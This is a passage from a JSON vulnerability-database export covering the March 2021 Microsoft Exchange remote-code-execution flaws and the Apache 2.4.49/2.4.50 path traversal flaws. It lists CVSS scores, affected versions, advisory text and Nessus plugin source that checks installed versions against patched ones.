"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-26857", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-26857", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:29:32", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "prion", "title": "Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-28T16:16:00", "id": "PRION:CVE-2021-41773", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-16T07:39:52", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:15:00", "type": "prion", "title": "Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-05T18:14:00", "id": "PRION:CVE-2021-42013", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T15:25:26", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to execute unauthorized arbitrary code. (CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078)", "cvss3": {}, "published": "2021-03-03T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Exchange Server (March 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2023-01-31T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "href": "https://www.tenable.com/plugins/nessus/147003", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147003);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/31\");\n\n script_cve_id(\n \"CVE-2021-26412\",\n \"CVE-2021-26854\",\n \"CVE-2021-26855\",\n \"CVE-2021-26857\",\n \"CVE-2021-26858\",\n \"CVE-2021-27065\",\n \"CVE-2021-27078\"\n );\n script_xref(name:\"MSKB\", value:\"5000871\");\n script_xref(name:\"MSFT\", value:\"MS21-5000871\");\n script_xref(name:\"IAVA\", value:\"2021-A-0111-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/16\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0014\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0018\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0013\");\n\n script_name(english:\"Security Updates for Microsoft Exchange Server (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to\n execute unauthorized arbitrary code. (CVE-2021-26412, CVE-2021-26854,\n CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065,\n CVE-2021-27078)\");\n # https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?14b26c05\");\n # https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fedb98e4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n -KB5000871\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26855\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyLogon RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'unsupported_cu' : 22,\n 'cu' : 23,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.12',\n 'kb': '5000871'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 14,\n 'min_version': '15.01.1847.0',\n 'fixed_version': '15.01.1847.12',\n 'kb': '5000871'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 13,\n 'cu' : 15,\n 'min_version': '15.01.1913.0',\n 'fixed_version': '15.01.1913.12',\n 'kb': '5000871'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 16,\n 'min_version': '15.01.1979.0',\n 'fixed_version': '15.01.1979.8',\n 'kb': '5000871'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 13,\n 'cu' : 18,\n 'min_version': '15.01.2106.0',\n 'fixed_version': '15.01.2106.13',\n 'kb': '5000871'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 19,\n 'min_version': '15.01.2176.0',\n 'fixed_version': '15.01.2176.9',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 4,\n 'min_version': '15.02.529.0',\n 'fixed_version': '15.02.529.13',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 5,\n 'min_version': '15.02.595.0',\n 'fixed_version': '15.02.595.8',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 6,\n 'min_version': '15.02.659.0',\n 'fixed_version': '15.02.659.12',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 7,\n 'min_version': '15.02.721.0',\n 'fixed_version': '15.02.721.13',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 8,\n 'min_version': '15.02.792.0',\n 'fixed_version': '15.02.792.10',\n 'kb': '5000871'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS20-12',\n constraints:constraints,\n severity:SECURITY_WARNING\n);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-03T15:34:47", "description": "The Apache http server project reports :\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013).\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\nAcknowledgements: Reported by Juan Escobar from Dreamlab Technologies, Fernando Munoz from NULL Life CTF Team, and Shungo Kumasaka", "cvss3": {}, "published": "2021-10-11T00:00:00", "type": "nessus", "title": "FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache24", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_D001C189279311EC8FB1206A8A720317.NASL", "href": "https://www.tenable.com/plugins/nessus/153983", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153983);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-42013\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Apache http server project reports :\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP\nServer 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n(CVE-2021-42013).\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server\n2.4.50 was insufficient. An attacker could use a path traversal attack\nto map URLs to files outside the directories configured by Alias-like\ndirectives.\n\nIf files outside of these directories are not protected by the usual\ndefault configuration 'require all denied', these requests can\nsucceed. If CGI scripts are also enabled for these aliased pathes,\nthis could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not\nearlier versions.\n\nAcknowledgements: Reported by Juan Escobar from Dreamlab Technologies,\nFernando Munoz from NULL Life CTF Team, and Shungo Kumasaka\");\n # https://vuxml.freebsd.org/freebsd/d001c189-2793-11ec-8fb1-206a8a720317.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c28c816\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24>=2.4.49<2.4.51\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "mscve": [{"lastseen": "2023-07-21T21:00:43", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-02T08:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-02T08:00:00", "id": "MS:CVE-2021-26412", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26412", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T21:00:35", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-02T08:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-02T08:00:00", "id": "MS:CVE-2021-26854", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26854", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T21:00:13", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-02T08:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-02T08:00:00", "id": "MS:CVE-2021-27078", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27078", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-05-27T14:32:22", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "cve", "title": "CVE-2021-26854", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-09T17:47:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-26854", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26854", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_7:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_18:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:32:22", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-27065, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "cve", "title": "CVE-2021-26858", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-08T20:46:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-26858", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26858", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_7:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", 